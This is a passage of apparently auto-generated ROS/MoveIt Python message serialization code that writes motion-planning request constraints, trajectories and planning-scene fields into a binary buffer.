buff.write(_get_struct_2dBd().pack(_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight)) _x = self.goal.request.path_constraints.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.request.path_constraints.joint_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.joint_constraints: _x = val1.joint_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1 buff.write(_get_struct_4d().pack(_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight)) length = len(self.goal.request.path_constraints.position_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.position_constraints: _v46 = val1.header buff.write(_get_struct_I().pack(_v46.seq)) _v47 = _v46.stamp _x = _v47 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v46.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v48 = val1.target_point_offset _x = _v48 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v49 = val1.constraint_region length = len(_v49.primitives) buff.write(_struct_I.pack(length)) for val3 in _v49.primitives: buff.write(_get_struct_B().pack(val3.type)) length = len(val3.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.dimensions)) length = len(_v49.primitive_poses) buff.write(_struct_I.pack(length)) for val3 in _v49.primitive_poses: _v50 = val3.position _x = _v50 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v51 = val3.orientation _x = _v51 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v49.meshes) buff.write(_struct_I.pack(length)) for val3 in _v49.meshes: length = len(val3.triangles) buff.write(_struct_I.pack(length)) for val4 in val3.triangles: buff.write(_get_struct_3I().pack(*val4.vertex_indices)) length = len(val3.vertices) buff.write(_struct_I.pack(length)) for val4 in val3.vertices: _x = val4 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v49.mesh_poses) buff.write(_struct_I.pack(length)) for val3 in _v49.mesh_poses: _v52 = val3.position _x = _v52 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v53 = val3.orientation _x = _v53 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_d().pack(val1.weight)) length = len(self.goal.request.path_constraints.orientation_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.orientation_constraints: _v54 = val1.header buff.write(_get_struct_I().pack(_v54.seq)) _v55 = _v54.stamp _x = _v55 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v54.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v56 = val1.orientation _x = _v56 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1 buff.write(_get_struct_4d().pack(_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight)) length = len(self.goal.request.path_constraints.visibility_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.visibility_constraints: buff.write(_get_struct_d().pack(val1.target_radius)) _v57 = val1.target_pose _v58 = _v57.header buff.write(_get_struct_I().pack(_v58.seq)) _v59 = _v58.stamp _x = _v59 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v58.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v60 = _v57.pose _v61 = _v60.position _x = _v61 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v62 = _v60.orientation _x = _v62 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_i().pack(val1.cone_sides)) _v63 = val1.sensor_pose _v64 = _v63.header buff.write(_get_struct_I().pack(_v64.seq)) _v65 = _v64.stamp _x = _v65 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v64.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v66 = _v63.pose _v67 = _v66.position _x = _v67 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v68 = _v66.orientation _x = _v68 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val1 buff.write(_get_struct_2dBd().pack(_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight)) length = len(self.goal.request.trajectory_constraints.constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.trajectory_constraints.constraints: _x = val1.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.joint_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.joint_constraints: _x = val2.joint_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight)) length = len(val1.position_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.position_constraints: _v69 = val2.header buff.write(_get_struct_I().pack(_v69.seq)) _v70 = _v69.stamp _x = _v70 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v69.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v71 = val2.target_point_offset _x = _v71 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v72 = val2.constraint_region length = len(_v72.primitives) buff.write(_struct_I.pack(length)) for val4 in _v72.primitives: buff.write(_get_struct_B().pack(val4.type)) length = len(val4.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val4.dimensions)) length = len(_v72.primitive_poses) buff.write(_struct_I.pack(length)) for val4 in _v72.primitive_poses: _v73 = val4.position _x = _v73 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v74 = val4.orientation _x = _v74 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v72.meshes) buff.write(_struct_I.pack(length)) for val4 in _v72.meshes: length = len(val4.triangles) buff.write(_struct_I.pack(length)) for val5 in val4.triangles: buff.write(_get_struct_3I().pack(*val5.vertex_indices)) length = len(val4.vertices) buff.write(_struct_I.pack(length)) for val5 in val4.vertices: _x = val5 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v72.mesh_poses) buff.write(_struct_I.pack(length)) for val4 in _v72.mesh_poses: _v75 = val4.position _x = _v75 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v76 = val4.orientation _x = _v76 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_d().pack(val2.weight)) length = len(val1.orientation_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.orientation_constraints: _v77 = val2.header buff.write(_get_struct_I().pack(_v77.seq)) _v78 = _v77.stamp _x = _v78 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v77.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v79 = val2.orientation _x = _v79 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight)) length = len(val1.visibility_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.visibility_constraints: buff.write(_get_struct_d().pack(val2.target_radius)) _v80 = val2.target_pose _v81 = _v80.header buff.write(_get_struct_I().pack(_v81.seq)) _v82 = _v81.stamp _x = _v82 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v81.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v83 = _v80.pose _v84 = _v83.position _x = _v84 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v85 = _v83.orientation _x = _v85 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_i().pack(val2.cone_sides)) _v86 = val2.sensor_pose _v87 = _v86.header buff.write(_get_struct_I().pack(_v87.seq)) _v88 = _v87.stamp _x = _v88 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v87.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v89 = _v86.pose _v90 = _v89.position _x = _v90 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v91 = _v89.orientation _x = _v91 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2 buff.write(_get_struct_2dBd().pack(_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight)) length = len(self.goal.request.reference_trajectories) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.reference_trajectories: _v92 = val1.header buff.write(_get_struct_I().pack(_v92.seq)) _v93 = _v92.stamp _x = _v93 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v92.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.joint_trajectory) buff.write(_struct_I.pack(length)) for val2 in val1.joint_trajectory: _v94 = val2.header buff.write(_get_struct_I().pack(_v94.seq)) _v95 = _v94.stamp _x = _v95 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v94.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val2.joint_names) buff.write(_struct_I.pack(length)) for val3 in val2.joint_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(val2.points) buff.write(_struct_I.pack(length)) for val3 in val2.points: length = len(val3.positions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.positions)) length = len(val3.velocities) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.velocities)) length = len(val3.accelerations) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.accelerations)) length = len(val3.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.effort)) _v96 = val3.time_from_start _x = _v96 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) length = len(val1.cartesian_trajectory) buff.write(_struct_I.pack(length)) for val2 in val1.cartesian_trajectory: _v97 = val2.header buff.write(_get_struct_I().pack(_v97.seq)) _v98 = _v97.stamp _x = _v98 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v97.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2.tracked_frame length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val2.points) buff.write(_struct_I.pack(length)) for val3 in val2.points: _v99 = val3.point _v100 = _v99.pose _v101 = _v100.position _x = _v101 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v102 = _v100.orientation _x = _v102 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _v103 = _v99.velocity _v104 = _v103.linear _x = _v104 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v105 = _v103.angular _x = _v105 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v106 = _v99.acceleration _v107 = _v106.linear _x = _v107 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v108 = _v106.angular _x = _v108 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v109 = val3.time_from_start _x = _v109 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) _x = self.goal.request.planner_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self.goal.request.group_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_i3d().pack(_x.goal.request.num_planning_attempts, _x.goal.request.allowed_planning_time, _x.goal.request.max_velocity_scaling_factor, _x.goal.request.max_acceleration_scaling_factor)) _x = self.goal.planning_options.planning_scene_diff.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_3I().pack(_x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.position) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *self.goal.planning_options.planning_scene_diff.robot_state.joint_state.position)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.velocity) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *self.goal.planning_options.planning_scene_diff.robot_state.joint_state.velocity)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *self.goal.planning_options.planning_scene_diff.robot_state.joint_state.effort)) _x = self buff.write(_get_struct_3I().pack(_x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms: _v110 = val1.translation _x = _v110 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v111 = val1.rotation _x = _v111 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist: _v112 = val1.linear _x = _v112 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v113 = val1.angular _x = _v113 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench: _v114 = val1.force _x = _v114 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v115 = val1.torque _x = _v115 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v116 = val1.object _v117 = _v116.header buff.write(_get_struct_I().pack(_v117.seq)) _v118 = _v117.stamp _x = _v118 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v117.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v116.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v119 = _v116.type _x = _v119.key length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v119.db length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v116.primitives) buff.write(_struct_I.pack(length)) for val3 in _v116.primitives: buff.write(_get_struct_B().pack(val3.type)) length = len(val3.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.dimensions)) length = len(_v116.primitive_poses) buff.write(_struct_I.pack(length)) for val3 in _v116.primitive_poses: _v120 = val3.position _x = _v120 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v121 = val3.orientation _x = _v121 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v116.meshes) buff.write(_struct_I.pack(length)) for val3 in _v116.meshes: length = len(val3.triangles) buff.write(_struct_I.pack(length)) for val4 in val3.triangles: buff.write(_get_struct_3I().pack(*val4.vertex_indices)) length = len(val3.vertices) buff.write(_struct_I.pack(length)) for val4 in val3.vertices: _x = val4 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v116.mesh_poses) buff.write(_struct_I.pack(length)) for val3 in _v116.mesh_poses: _v122 = val3.position _x = _v122 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v123 = val3.orientation _x = _v123 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v116.planes) buff.write(_struct_I.pack(length)) for val3 in _v116.planes: buff.write(_get_struct_4d().pack(*val3.coef)) length = len(_v116.plane_poses) buff.write(_struct_I.pack(length)) for val3 in _v116.plane_poses: _v124 = val3.position _x = _v124 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v125 = val3.orientation _x = _v125 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v116.subframe_names) buff.write(_struct_I.pack(length)) for val3 in _v116.subframe_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v116.subframe_poses) buff.write(_struct_I.pack(length)) for val3 in _v116.subframe_poses: _v126 = val3.position _x = _v126 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v127 = val3.orientation _x = _v127 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_b().pack(_v116.operation)) length = len(val1.touch_links) buff.write(_struct_I.pack(length)) for val2 in val1.touch_links: length = len(val2) if python3 or type(val2) == unicode: val2 = val2.encode('utf-8') length = len(val2) buff.write(struct.pack('<I%ss'%length, length, val2)) _v128 = val1.detach_posture _v129 = _v128.header buff.write(_get_struct_I().pack(_v129.seq)) _v130 = _v129.stamp _x = _v130 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v129.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v128.joint_names) buff.write(_struct_I.pack(length)) for val3 in _v128.joint_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v128.points) buff.write(_struct_I.pack(length)) for val3 in _v128.points: length = len(val3.positions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.positions)) length = len(val3.velocities) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.velocities)) length = len(val3.accelerations) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.accelerations)) length = len(val3.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.effort)) _v131 = val3.time_from_start _x = _v131 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) buff.write(_get_struct_d().pack(val1.weight)) buff.write(_get_struct_B().pack(self.goal.planning_options.planning_scene_diff.robot_state.is_diff)) _x = self.goal.planning_options.planning_scene_diff.robot_model_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.planning_options.planning_scene_diff.fixed_frame_transforms) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.fixed_frame_transforms: _v132 = val1.header buff.write(_get_struct_I().pack(_v132.seq)) _v133 = _v132.stamp _x = _v133 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v132.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1.child_frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v134 = val1.transform _v135 = _v134.translation _x = _v135 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v136 = _v134.rotation _x = _v136 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values: length = len(val1.enabled) buff.write(_struct_I.pack(length)) pattern = '<%sB'%length buff.write(struct.pack(pattern, *val1.enabled)) length = len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values) buff.write(_struct_I.pack(length)) pattern = '<%sB'%length buff.write(struct.pack(pattern, *self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values)) length = len(self.goal.planning_options.planning_scene_diff.link_padding) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.link_padding: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_get_struct_d().pack(val1.padding)) length = len(self.goal.planning_options.planning_scene_diff.link_scale) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.link_scale: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_get_struct_d().pack(val1.scale)) length = len(self.goal.planning_options.planning_scene_diff.object_colors) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.object_colors: _x = val1.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v137 = val1.color _x = _v137 buff.write(_get_struct_4f().pack(_x.r, _x.g, _x.b, _x.a)) length = len(self.goal.planning_options.planning_scene_diff.world.collision_objects) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.world.collision_objects: _v138 = val1.header buff.write(_get_struct_I().pack(_v138.seq)) _v139 = _v138.stamp _x = _v139 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v138.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v140 = val1.type _x = _v140.key length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v140.db length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.primitives) buff.write(_struct_I.pack(length)) for val2 in val1.primitives: buff.write(_get_struct_B().pack(val2.type)) length = len(val2.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val2.dimensions)) length = len(val1.primitive_poses) buff.write(_struct_I.pack(length)) for val2 in val1.primitive_poses: _v141 = val2.position _x = _v141 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v142 = val2.orientation _x = _v142 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(val1.meshes) buff.write(_struct_I.pack(length)) for val2 in val1.meshes: length = len(val2.triangles) buff.write(_struct_I.pack(length)) for val3 in val2.triangles: buff.write(_get_struct_3I().pack(*val3.vertex_indices)) length = len(val2.vertices) buff.write(_struct_I.pack(length)) for val3 in val2.vertices: _x = val3 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(val1.mesh_poses) buff.write(_struct_I.pack(length)) for val2 in val1.mesh_poses: _v143 = val2.position _x = _v143 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v144 = val2.orientation _x = _v144 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(val1.planes) buff.write(_struct_I.pack(length)) for val2 in val1.planes: buff.write(_get_struct_4d().pack(*val2.coef)) length = len(val1.plane_poses) buff.write(_struct_I.pack(length)) for val2 in val1.plane_poses: _v145 = val2.position _x = _v145 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v146 = val2.orientation _x = _v146 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(val1.subframe_names) buff.write(_struct_I.pack(length)) for val2 in val1.subframe_names: length = len(val2) if python3 or type(val2) == unicode: val2 = val2.encode('utf-8') length = len(val2) buff.write(struct.pack('<I%ss'%length, length, val2)) length = len(val1.subframe_poses) buff.write(_struct_I.pack(length)) for val2 in val1.subframe_poses: _v147 = val2.position _x = _v147 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v148 = val2.orientation _x = _v148 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_b().pack(val1.operation)) _x = self buff.write(_get_struct_3I().pack(_x.goal.planning_options.planning_scene_diff.world.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.world.octomap.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self 